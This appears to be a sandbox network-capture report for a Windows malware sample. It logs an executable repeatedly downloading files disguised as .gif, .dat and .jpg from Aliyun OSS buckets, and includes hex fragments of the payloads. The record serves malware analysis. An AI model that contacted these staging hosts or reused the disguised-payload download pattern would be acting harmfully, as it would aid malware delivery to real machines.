                                                                                                              Jan 11, 2025 04:43:59.540678024 CET49993443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:43:59.542768955 CET44349993118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:43:59.542829990 CET49993443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:43:59.544917107 CET44349993118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:43:59.544970989 CET49993443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:43:59.549598932 CET44349993118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:43:59.549654007 CET49993443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.377551079 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.379795074 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.379843950 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.382222891 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.382275105 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.387018919 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.387072086 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.389283895 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.389329910 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.394062996 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.394105911 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.396558046 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.396603107 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.398988008 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.399041891 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.403644085 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.403690100 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.406085014 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.406136036 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.411010027 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.411061049 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.413434982 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.413484097 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.417998075 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.418044090 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.420397043 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.420439959 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.422756910 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.422804117 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.427623034 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.427666903 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.430078983 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.430124998 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.434700966 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.434746027 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.437247038 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.437302113 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.439555883 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.439600945 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.444256067 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.444305897 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.446710110 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.446747065 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.451328993 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.451374054 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.453923941 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.454010963 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.456114054 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.456161022 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.461133957 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.461184025 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.463504076 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.463551044 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.468267918 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.468317986 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.470630884 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.470676899 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.475372076 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.475415945 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.477718115 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.477766991 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.480084896 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.480137110 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.484837055 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.484894991 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.487251043 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.487296104 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.492217064 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.492270947 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.494482040 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.494522095 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.604615927 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.604676962 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.607852936 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.607913971 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.610253096 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.610306978 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.614943981 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.614989996 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.617249966 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.617300987 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.619555950 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.619609118 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.624051094 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.624106884 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.626343966 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.626399994 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.631006002 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.631057978 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.633316994 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.633379936 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.637826920 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.637892008 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.640189886 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.640252113 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.642424107 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.642479897 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.647074938 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.647140980 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.649420023 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.649471045 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.653840065 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.653892994 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.656236887 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.656301975 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.658598900 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.658652067 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.663254976 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.663319111 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.665364981 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.665417910 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.669980049 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.670044899 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.672319889 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.672374964 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.677009106 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.677061081 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.679224014 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.679270029 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.681472063 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.681516886 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.686053991 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.686103106 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.688355923 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.688405991 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.692969084 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.693033934 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.695245981 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.695296049 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.697601080 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.697644949 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.702138901 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.702197075 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.704447031 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.704505920 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.709013939 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.709055901 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.711237907 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.711292982 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.713476896 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.713521004 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.717777967 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.717829943 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.719914913 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.719970942 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.724267006 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.724319935 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.726243019 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.726289988 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.735429049 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.735466957 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.735483885 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.735492945 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.735511065 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.735516071 CET49994443192.168.2.8118.178.60.103
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
• 662hfg.oss-cn-beijing.aliyuncs.com
• 22mm.oss-cn-hangzhou.aliyuncs.com
• upitem.oss-cn-hangzhou.aliyuncs.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49708 | 39.103.20.105 | 443 | 1824 | C:\Users\user\Desktop\2976587-987347589.07.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:42:17 UTC | 111 | OUT | GET /i.dat HTTP/1.1
User-Agent: GetData
Host: 662hfg.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-11 03:42:17 UTC | 558 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Sat, 11 Jan 2025 03:42:17 GMT
Content-Type: application/octet-stream
Content-Length: 512
Connection: close
x-oss-request-id: 6781E899EE5BBF3937538155
Accept-Ranges: bytes
ETag: "A1CC6E3DD3069453BEF8913F9698C666"
Last-Modified: Fri, 10 Jan 2025 12:35:03 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 15148768218617465077
x-oss-storage-class: Standard
x-oss-ec: 0048-00000113
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: ocxuPdMGlFO++JE/lpjGZg==
x-oss-server-time: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 39.103.20.105 | 443 | 1824 | C:\Users\user\Desktop\2976587-987347589.07.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:42:18 UTC | 111 | OUT | GET /a.gif HTTP/1.1
User-Agent: GetData
Host: 662hfg.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-11 03:42:19 UTC | 545 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Sat, 11 Jan 2025 03:42:19 GMT
Content-Type: image/gif
Content-Length: 135589
Connection: close
x-oss-request-id: 6781E89BBB04C53735AFEAA4
Accept-Ranges: bytes
ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 8642451798640735006
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
x-oss-server-time: 4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 39.103.20.105 | 443 | 1824 | C:\Users\user\Desktop\2976587-987347589.07.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:42:20 UTC | 111 | OUT | GET /b.gif HTTP/1.1
User-Agent: GetData
Host: 662hfg.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-11 03:42:21 UTC | 546 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Sat, 11 Jan 2025 03:42:21 GMT
Content-Type: image/gif
Content-Length: 125333
Connection: close
x-oss-request-id: 6781E89D5A53BB3131F615ED
Accept-Ranges: bytes
ETag: "2CA9F4AB0970AA58989D66D9458F8701"
Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10333201072197591521
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
x-oss-server-time: 3
                                                                                                              Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                                                                              2025-01-11 03:42:21 UTC4096INData Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52
                                                                                                              Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49711 | 39.103.20.105 | 443 | 1824 | C:\Users\user\Desktop\2976587-987347589.07.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:42:22 UTC | 111 | OUT | GET /c.gif HTTP/1.1
User-Agent: GetData
Host: 662hfg.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-11 03:42:23 UTC | 546 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Sat, 11 Jan 2025 03:42:22 GMT
Content-Type: image/gif
Content-Length: 10681
Connection: close
x-oss-request-id: 6781E89E820F3F35349B9878
Accept-Ranges: bytes
ETag: "10A818386411EE834D99AE6B7B68BE71"
Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10287299869673359293
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
x-oss-server-time: 16


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49712 | 39.103.20.105 | 443 | 1824 | C:\Users\user\Desktop\2976587-987347589.07.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:42:24 UTC | 111 | OUT | GET /d.gif HTTP/1.1
User-Agent: GetData
Host: 662hfg.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-11 03:42:24 UTC | 547 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Sat, 11 Jan 2025 03:42:24 GMT
Content-Type: image/gif
Content-Length: 3892010
Connection: close
x-oss-request-id: 6781E8A077F3A93932A8C02E
Accept-Ranges: bytes
ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
Last-Modified: Fri, 10 Jan 2025 12:31:05 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 3363616613234190325
x-oss-storage-class: Standard
x-oss-ec: 0048-00000104
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
x-oss-server-time: 28


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49714 | 39.103.20.105 | 443 | 1824 | C:\Users\user\Desktop\2976587-987347589.07.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:42:33 UTC | 111 | OUT | GET /s.dat HTTP/1.1
User-Agent: GetData
Host: 662hfg.oss-cn-beijing.aliyuncs.com
Cache-Control: no-cache
2025-01-11 03:42:33 UTC | 559 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Sat, 11 Jan 2025 03:42:33 GMT
Content-Type: application/octet-stream
Content-Length: 28272
Connection: close
x-oss-request-id: 6781E8A972AE9E35302ABC60
Accept-Ranges: bytes
ETag: "6D793DEEE57502B69E89D0D15BEB4BD8"
Last-Modified: Sat, 11 Jan 2025 03:42:21 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 6756283170469504006
x-oss-storage-class: Standard
x-oss-ec: 0048-00000113
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: bXk97uV1AraeidDRW+tL2A==
x-oss-server-time: 7
                                                                                                              Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                                                                              2025-01-11 03:42:33 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                                                              Data Ascii: ,$LDld=5}u]U
                                                                                                              2025-01-11 03:42:33 UTC4096INData Raw: a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 ed
                                                                                                              Data Ascii: <EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                                                                              2025-01-11 03:42:33 UTC159INData Raw: 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 9f 16 ec 9f
                                                                                                              Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49715 | 39.103.20.105 | 443 | 1824 | C:\Users\user\Desktop\2976587-987347589.07.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:42:35 UTC | 111 | OUT | GET /s.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                                              Cache-Control: no-cache
2025-01-11 03:42:35 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:35 GMT
                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 8299
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8AB35EB263738148279
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                                                                              Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 692387538176721524
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000104
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                                                                              x-oss-server-time: 25


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49737 | 118.178.60.9 | 443 | 4064 | C:\Users\user\Documents\l0tiFM.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:42:51 UTC | 114 | OUT | GET /drops.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
2025-01-11 03:42:51 UTC | 546 | IN | HTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:51 GMT
